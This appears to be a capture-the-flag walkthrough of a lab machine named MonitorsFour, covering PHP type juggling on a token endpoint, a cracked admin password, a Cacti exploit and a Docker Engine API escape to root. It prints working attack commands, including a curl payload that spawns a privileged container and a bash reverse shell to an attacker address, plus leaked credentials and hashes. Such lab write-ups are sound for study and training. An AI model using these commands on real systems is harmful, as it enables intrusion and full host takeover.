Monitorsfour

NMAP

PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/

Foothold

  • the web app at monitorsfour.htb has a login page, but default creds don't work. Forgot password sends you to an email page.
  • vhost fuzzing found cacti.monitorsfour.htb
  • directory fuzzing found .env
    DB_HOST=mariadb
    DB_PORT=3306
    DB_NAME=monitorsfour_db
    DB_USER=monitorsdbuser
    DB_PASS=f37p2j8f4t0r
    
  • another interesting endpoint: /user?token=
  • an Intruder attack to enumerate usernames did not work
  • token values 1..100 did not work
  • token=0 returns the data below
    [{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},
    {"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},
    {"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},
    {"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
    
  • this looks like PHP type juggling: the token is checked with a loose comparison (==) instead of a strict one (===). Three of the four stored tokens start with 0e followed by digits, which PHP treats as a numeric string equal to 0, so a supplied token of 0 compares equal to them.
    • https://secops.group/php-type-juggling-simplified/
  • running the four hashes (32 hex characters, MD5-length) through CrackStation cracks only the admin one:
    admin:wonderful1
    mwatson:
    janderson:
    dthompson:
    
  • logged in to the portal as admin
  • created a new user and hit the user endpoint again; the new account shows up with role admin and a null token
    {"id":10,"username":"neal","email":"neal@ecorp.com","password":"5c2b66f41ec8e969bf014934243ff26a","role":"admin","token":null,"name":"Neal","position":"Security Engineer","dob":"2000-12-09","start_date":"2025-12-02","salary":"90000.00"}]
    
  • the monitorsfour web app has no code-execution capability, so try the recovered password against cacti.monitorsfour.htb.
  • we know the usernames from the /user dump:
    • try wonderful1 with admin, mhiggins, mwatson, marcus
    • marcus:wonderful1 works
  • now we are in the Cacti dashboard as marcus.
  • use https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC/blob/main/exploit.py (an authenticated exploit, so it takes the marcus credentials)
  • start an nc listener on 443, then run:
    python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.5 -l 443 -url http://cacti.monitorsfour.htb
  • we get a reverse shell as www-data inside what looks like a Linux Docker container.
  • user.txt is in /home/marcus - 002fe8fc0e4abd650b4c8e0fd049e55d
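
The token check above, as an added Python example that is not part of the original writeup: a model of PHP's loose (==) and strict (===) comparison rules, run against the four tokens from the /user dump. The application's source is not on the page, so the shape of the check, `$row['token'] == $_GET['token']`, is an assumption; only the comparison semantics are PHP's documented behaviour (numeric-string detection, PHP 7 vs PHP 8 int/string rules). The stored tokens are copied from the dump; everything else is constructed.

```python
import re

# Constructed from the /user?token=0 dump: username -> stored token.
USER_TOKENS = {
    "admin": "8024b78f83f102da4f",
    "mwatson": "0e543210987654321",
    "janderson": "0e999999999999999",
    "dthompson": "0e111111111111111",
}

# PHP numeric-string grammar: optional whitespace and sign, digits with an
# optional fraction, optional exponent. "0e543210987654321" is
# 0 * 10^543210987654321, i.e. the number 0, so it counts as numeric.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
# PHP 7 "leading-numeric" conversion applied when a non-numeric string meets an int.
_LEADING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_numeric_string(s: str) -> bool:
    return bool(_NUMERIC.match(s))


def php_loose_eq(a, b, php8: bool = True) -> bool:
    """Model of PHP's == for the cases that matter here (str/str and int/str).

    str == str : compared as numbers if BOTH sides are numeric strings,
                 otherwise compared byte-for-byte.
    int == str : numeric comparison if the string is numeric; otherwise
                 PHP 8 casts the int to a string and compares strings, while
                 PHP 7 converts the string to its leading number (or 0).
    """
    if isinstance(a, str) and isinstance(b, str):
        if is_numeric_string(a) and is_numeric_string(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, str):          # normalise to (int, str)
        a, b = b, a
    if is_numeric_string(b):
        return float(a) == float(b)
    if php8:
        return str(a) == b
    m = _LEADING.match(b)
    return float(a) == (float(m.group(0)) if m else 0.0)


def php_strict_eq(a, b) -> bool:
    """Model of ===: same type and same value, no conversion at all."""
    return type(a) is type(b) and a == b


def matching_users(supplied, strict: bool = False, php8: bool = True):
    """Usernames whose stored token 'matches' the supplied value.

    strict=False models the assumed `$row['token'] == $_GET['token']` check;
    strict=True models the `===` fix.
    """
    cmp = php_strict_eq if strict else (lambda x, y: php_loose_eq(x, y, php8))
    return [u for u, t in USER_TOKENS.items() if cmp(t, supplied)]


if __name__ == "__main__":
    print("loose  token=0 :", matching_users("0"))
    print("strict token=0 :", matching_users("0", strict=True))
```

Under loose comparison the three 0e tokens match a supplied "0" because both sides are numeric strings that evaluate to 0; the admin token is not numeric and does not match by this rule alone, so the endpoint evidently returns the whole user table once the lookup succeeds (consistent with it later listing the newly created user, whose token is null). With `===` nothing matches, which is the fix.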

Privesc

  • trying a Docker escape. The container has a single interface on the 172.18.0.0/16 Docker bridge:

    ip addr
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host proto kernel_lo
           valid_lft forever preferred_lft forever
    2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
        link/ether ce:48:5c:bc:b7:b9 brd ff:ff:ff:ff:ff:ff link-netnsid 0
        inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
           valid_lft forever preferred_lft forever
    

  • /etc/resolv.conf shows the embedded Docker DNS resolver at 127.0.0.11, which forwards to 192.168.65.7 on the host side:

    cat /etc/resolv.conf
    # Generated by Docker Engine.
    # This file can be edited; Docker Engine will not make further changes once it
    # has been modified.
    
    nameserver 127.0.0.11
    options ndots:0
    
    # Based on host file: '/etc/resolv.conf' (internal resolver)
    # ExtServers: [host(192.168.65.7)]
    # Overrides: []
    # Option ndots from: internal
    

  • set up a ligolo-ng agent on the Docker foothold so we can reach 192.168.65.7 from the attack box.

  • tried nmap through the pivot and saw MySQL-like open ports, but couldn't connect to them
  • downloaded https://github.com/shadow1ng/fscan to the container and scanned 192.168.65.7 on all ports:
    curl http://10.10.14.5/fscan -o fscan
    ./fscan -h 192.168.65.7 -p 1-65535
    
       ___                              _
      / _ \     ___  ___ _ __ __ _  ___| | __
     / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
    / /_\\_____\__ \ (__| | | (_| | (__|   <
    \____/     |___/\___|_|  \__,_|\___|_|\_\
                         fscan version: 1.8.4
    start infoscan
    192.168.65.7:53 open
    192.168.65.7:2375 open
    192.168.65.7:3128 open
    192.168.65.7:5555 open
    [*] alive ports len is: 4
    start vulscan
    [*] WebTitle http://192.168.65.7:2375  code:404 len:29     title:None
    [*] WebTitle http://192.168.65.7:5555  code:200 len:0      title:None
    [+] PocScan http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rce
    [+] PocScan http://192.168.65.7:2375 poc-yaml-go-pprof-leak
    Completed 4/4
    [*] Scan finished, elapsed: 16.144064567s
    
  • https://medium.com/@iramjack8/container-vulnerabilities-part-3-a77f40828a25
  • curl http://192.168.65.7:2375/version
    • this returns version JSON, meaning we can talk to the Docker daemon from inside the container
    • this is an unauthenticated Docker Engine API, which is what fscan flagged as poc-yaml-docker-api-unauthorized-rce
  • this matches CVE-2025-9074 (Docker Desktop exposing its Engine API to containers without authentication); PoC from https://github.com/j3r1ch0123/CVE-2025-9074:
    # Setup listener on Kali first
    nc -nlvp 443
    
    # Create container (adjust IP/PORT)
    curl -X POST \
      -H "Content-Type: application/json" \
      -d '{"Image":"alpine","Cmd":["sh","-c","chroot /host bash -c '\''bash -i >& /dev/tcp/10.10.14.5/443 0>&1'\''"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
      http://192.168.65.7:2375/containers/create -o create3.json
    
    # Extract container ID
    cid3=$(cut -d'"' -f4 create3.json)
    
    # Start container (triggers reverse shell)
    curl -X POST http://192.168.65.7:2375/containers/$cid3/start
    
  • we get a root reverse shell on the nc listener: the container is privileged with the host root filesystem bound at /host, and the host has the Windows filesystem mounted under /mnt/host.
  • root.txt is in /mnt/host/C/Users/Administrator/Desktop - c032c83ae4780e183d38fd1008d77d33